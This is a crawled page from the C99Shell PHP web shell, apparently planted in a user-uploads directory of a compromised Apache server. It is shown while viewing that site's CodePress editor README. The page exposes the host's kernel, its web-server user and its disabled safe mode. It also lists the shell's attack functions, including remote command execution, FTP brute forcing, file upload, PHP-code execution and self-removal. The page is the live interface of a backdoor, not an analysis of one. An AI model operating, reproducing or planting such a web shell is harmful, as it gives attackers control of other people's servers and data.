!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/www/message.axkickboxing.com/public_html/images/user_uploaded/pafm/codepress/   drwxrwxr-x
Free 3.2 GB of 97.11 GB (3.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.html (14.06 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
CodePress - Real Time Syntax Highlighting Editor written in JavaScript

CodePress is web-based source code editor with syntax highlighting written in JavaScript that colors text in real time while it's being typed in the browser.

Go to http://codepress.org/ for updates.

Demo

choose example in:


Installation

  1. Download and uncompress CodePress under a directory inside your webserver.
    Example: http://yourserver/codepress/
    Since CodePress is pure JavaScript and HTML, you can also test it without a webserver.

  2. Insert CodePress script somewhere in your page inside the <head> or above the </body> tag.

    <script src="/codepress/codepress.js" type="text/javascript"></script>

  3. Add the <textarea> tag to the place on your page you want CodePress to appear. CodePress will inherit the width and height of your textarea. When the page loads, it will automatically replace your textarea with a CodePress window.

    <textarea id="myCpWindow" class="codepress javascript linenumbers-off">
       // your code here
    </textarea>

    • The javascript portion of the class="" means that the language being edited is JavaScript.
    • The codepress portion of the class="" is mandatory and indicates a textarea to be replaced for a CodePress window.
    • Other class options are linenumbers-off, autocomplete-off and readonly-on.
    • Careful not to use the same id for two different CodePress windows (<textarea id="xx"...>)

You also can...

  1. Open/edit code from a different textarea.
    Example: textarea_id.edit('other_textarea_id','language')
  2. Get code from CodePress window.
    Example: textarea_id.getCode()
  3. Turn on/off CodePress editor and return to the regular textarea.
    Example: textarea_id.toggleEditor()
  4. Turn on/off line numbers.
    Example: textarea_id.toggleLineNumbers()
  5. Turn on/off read only.
    Example: textarea_id.toggleReadOnly()
  6. Turn on/off auto-complete.
    Example: textarea_id.toggleAutoComplete()

License

CodePress is distributed under the LGPL. If your software is compatible with this licence or it is under Creative Commons, you can use it as you want. Just keep the credits somewhere around.


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0045 ]--